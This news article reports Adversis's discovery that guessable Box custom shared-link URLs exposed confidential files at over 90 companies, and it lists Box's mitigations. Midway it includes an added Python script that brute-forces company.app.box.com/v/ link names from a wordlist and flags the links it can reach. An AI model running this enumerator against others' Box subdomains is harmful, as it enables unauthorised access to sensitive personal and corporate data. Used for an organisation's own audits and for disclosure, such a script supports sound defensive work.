Security researchers have uncovered a potential leak of confidential corporate files caused by misconfigured accounts on the cloud storage service Box.
Cybersecurity firm Adversis announced that its team has found an issue with Box accounts that leaves many subscribers, including Apple and other tech companies, open to data breach.
Box is a cloud-based content management and file sharing service designed to cater to businesses. It provides users with data protection through AES 256-bit encryption.
However, when Adversis researchers examined the service, they found that they could reach hundreds of thousands of documents and other files because of the way custom shared links are exposed on customers' Box subdomains.
The problem lies in how Box lets enterprise subscribers share files through custom links on a subdomain of their own. Because every such link lives under a predictable path on that subdomain, anyone who knows a company's subdomain can guess other custom link names and open whatever files have been shared publicly, without any authentication.
In their review, Adversis researchers found that over 90 organizations had files and folders publicly accessible this way. Apple, Amadeus, Discovery, Edelman, Herbalife, and Pointcare are just some of the companies found to have data exposed on the service.
The team found large amounts of sensitive information, including passport photos, social security and bank account numbers, employee lists, customer lists, financial data, IT data, and even files on a high-profile technology prototype.
Adversis pointed out that the issue is not a bug or vulnerability in Box's system, and that it had been raised before. A Twitter user by the name of Nenad Zaric posted about it in 2017, though the cybersecurity company said the warning did not seem to get enough attention.
“If your company is using #Box with custom domain, try brute-forcing /v/path (http://company.app.box.com/v/). There could be a lot of confidential data exposed. #BugBounty #Security,” Zaric wrote.
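To make the guessing technique concrete, the following Python script is an added example written for this article; it is not code from Adversis, Zaric, or Box. It builds candidate custom-link URLs of the form company.app.box.com/v/NAME from a wordlist, probes each one, and sorts the results into exposed, missing, and "other" buckets. The subdomain example-corp, the wordlist, and the fake responses in the demo are all constructed; the assumption that an existing public link answers 200, an unknown name answers 404, and throttling answers 429 is the author's, not something the article states, so check the real codes against a link you own before relying on the classification.

```python
"""Enumerate guessable Box custom shared links (added example, not Box's or Adversis's code)."""
from typing import Callable, Dict, Iterable, List
import urllib.error
import urllib.request


def candidate_urls(subdomain: str, names: Iterable[str]) -> List[str]:
    """Turn a company subdomain and a list of guesses into /v/ URLs, skipping blank names."""
    sub = subdomain.strip().lower()
    return [f"https://{sub}.app.box.com/v/{n.strip()}" for n in names if n.strip()]


def expand_wordlist(bases: Iterable[str], years: Iterable[int] = ()) -> List[str]:
    """Grow a base wordlist with the kinds of suffixes people put on shared folders.

    E.g. 'report' -> 'report', 'report-2018', 'report2018' for each year given.
    """
    out: List[str] = []
    for base in bases:
        out.append(base)
        for y in years:
            out.append(f"{base}-{y}")
            out.append(f"{base}{y}")
    return out


def fetch_status(url: str, timeout: float = 10.0) -> int:
    """Live probe: HEAD the URL and return the HTTP status (HTTPError carries 4xx/5xx)."""
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "box-link-audit"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def enumerate_custom_links(
    subdomain: str,
    names: Iterable[str],
    fetch: Callable[[str], int] = fetch_status,
) -> Dict[str, List[str]]:
    """Probe every candidate and classify it.

    Assumed mapping (author's assumption, verify against a link you own):
      200 -> 'exposed' (a public custom link exists at that name)
      404 -> 'missing'
      429 -> throttled; recorded under 'other' and enumeration stops so we do not
             hammer the service; any other code is also recorded under 'other'.
    """
    result: Dict[str, List[str]] = {"exposed": [], "missing": [], "other": []}
    for url in candidate_urls(subdomain, names):
        code = fetch(url)
        if code == 200:
            result["exposed"].append(url)
        elif code == 404:
            result["missing"].append(url)
        else:
            result["other"].append(f"{url} ({code})")
            if code == 429:
                break
    return result


# Constructed offline demo: a fake fetcher standing in for the network.
FAKE_RESPONSES = {
    "https://example-corp.app.box.com/v/annual-report": 200,
    "https://example-corp.app.box.com/v/passports": 200,
    "https://example-corp.app.box.com/v/ratelimit": 429,
}


def fake_fetch(url: str) -> int:
    """Return the constructed status for a URL, 404 for anything else."""
    return FAKE_RESPONSES.get(url, 404)


if __name__ == "__main__":
    guesses = ["annual-report", "passports", "nothing", "ratelimit", "never-probed"]
    # Swap fetch=fetch_status to probe a subdomain you are authorised to test.
    found = enumerate_custom_links("Example-Corp", guesses, fetch=fake_fetch)
    for bucket, urls in found.items():
        print(bucket, urls)
```

Because the probe is a plain unauthenticated request, the same loop run by an administrator against their own subdomain doubles as a quick external check that no custom link names are reachable that the shared link report did not account for; the 429 stop is there so an audit does not turn into a denial of service.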
Adversis said Box has published several steps subscribers can take to protect their accounts from URL guessing.
Administrators are advised to set the default access level for shared links to “People in your company” so that users do not accidentally create public or open links. They should also run a shared link report regularly to find and clean up public custom shared links.
The company also recommends that users avoid creating public custom shared links to private content at all.
Data breaches involving cloud services remain a particular concern for companies, given their ever-increasing dependence on web-based file storage. More than 99 billion records were left exposed by data breaches in 2017 alone, according to Imperva Incapsula.
While companies employ different strategies to secure sensitive data from attacks, vulnerabilities still occur even to the biggest companies in the world.
In 2017, Verizon was exposed to a potential data breach because of a misconfigured cloud-based file repository. The blunder left the names, addresses, account details, and account personal identification numbers (PINs) of millions of U.S. customers open to anyone who found the storage location.
Also in 2017, researchers found at least four publicly accessible cloud storage buckets in Accenture's infrastructure. Sensitive material such as secret API data, authentication credentials, certificates, decryption keys, and customer information was left unsecured and publicly downloadable.
The exposure was linked to Accenture Cloud Platform, a multi-cloud management platform used primarily by the company's customers.